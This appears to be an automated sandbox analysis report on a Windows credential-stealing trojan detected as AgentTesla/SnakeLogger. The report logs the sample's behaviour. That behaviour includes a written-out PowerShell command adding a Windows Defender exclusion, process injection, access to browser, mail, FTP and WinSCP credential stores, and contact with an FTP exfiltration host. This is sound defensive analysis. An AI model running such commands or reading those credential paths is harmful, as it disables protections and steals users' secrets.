                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1200000Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199828Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199718Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199592Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199484Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199375Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199248Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199140Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199031Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1198894Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1198734Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1198504Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1198218Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1198020Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197875Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197765Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197656Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197546Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197437Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197328Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197218Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197109Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197000Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196890Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196781Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196672Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196559Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196453Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196343Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196234Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196125Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196015Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195906Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195797Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195687Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195578Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195468Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195359Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195250Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195140Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195031Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194922Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194812Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194703Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194593Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194484Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194374Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194265Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194156Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194047Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1193937Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1193827Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1193718Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1193609Jump to behavior
                  Source: hesaphareketi__20241001.exe, 00000005.00000002.4608940593.0000000001148000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe"
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe"Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeMemory written: C:\Users\user\Desktop\hesaphareketi__20241001.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess created: C:\Users\user\Desktop\hesaphareketi__20241001.exe "C:\Users\user\Desktop\hesaphareketi__20241001.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeQueries volume information: C:\Users\user\Desktop\hesaphareketi__20241001.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeQueries volume information: C:\Users\user\Desktop\hesaphareketi__20241001.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.hesaphareketi__20241001.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: hesaphareketi__20241001.exe PID: 5732, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: hesaphareketi__20241001.exe PID: 2360, type: MEMORYSTR
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.hesaphareketi__20241001.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.4610095898.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: hesaphareketi__20241001.exe PID: 5732, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: hesaphareketi__20241001.exe PID: 2360, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.hesaphareketi__20241001.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: hesaphareketi__20241001.exe PID: 5732, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: hesaphareketi__20241001.exe PID: 2360, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Encrypted Channel                  		1
                  Exfiltration Over Alternative Protocol                  		Abuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		21
                  Input Capture                  		24
                  System Information Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		1
                  Non-Standard Port                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		111
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		1
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                  Software Packing                  		NTDS1
                  Process Discovery                  		Distributed Component Object Model21
                  Input Capture                  		11
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp                  		LSA Secrets141
                  Virtualization/Sandbox Evasion                  		SSH1
                  Clipboard Data                  		Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                  Virtualization/Sandbox Evasion                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                  Process Injection                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  hesaphareketi__20241001.exe75%ReversingLabsByteCode-MSIL.Trojan.SnakeLogger
                  hesaphareketi__20241001.exe28%VirustotalBrowse
                  hesaphareketi__20241001.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  ftp.normagroup.com.tr12%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  https://account.dyn.com/0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://ftp.normagroup.com.tr12%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ftp.normagroup.com.tr
                  		104.247.165.99
                  		truetrueunknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://ftp.normagroup.com.trhesaphareketi__20241001.exe, 00000005.00000002.4610095898.0000000003014000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi__20241001.exe, 00000005.00000002.4610095898.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi__20241001.exe, 00000005.00000002.4610095898.0000000002E47000.00000004.00000800.00020000.00000000.sdmptrueunknown
                  https://account.dyn.com/hesaphareketi__20241001.exe, 00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi__20241001.exe, 00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehesaphareketi__20241001.exe, 00000000.00000002.2149506599.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi__20241001.exe, 00000005.00000002.4610095898.0000000002DC0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  104.247.165.99
                  		ftp.normagroup.com.trUnited States
                  		8100ASN-QUADRANET-GLOBALUStrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1524784
                  Start date and time:2024-10-03 09:10:13 +02:00
                  Joe Sandbox product:CloudBasic
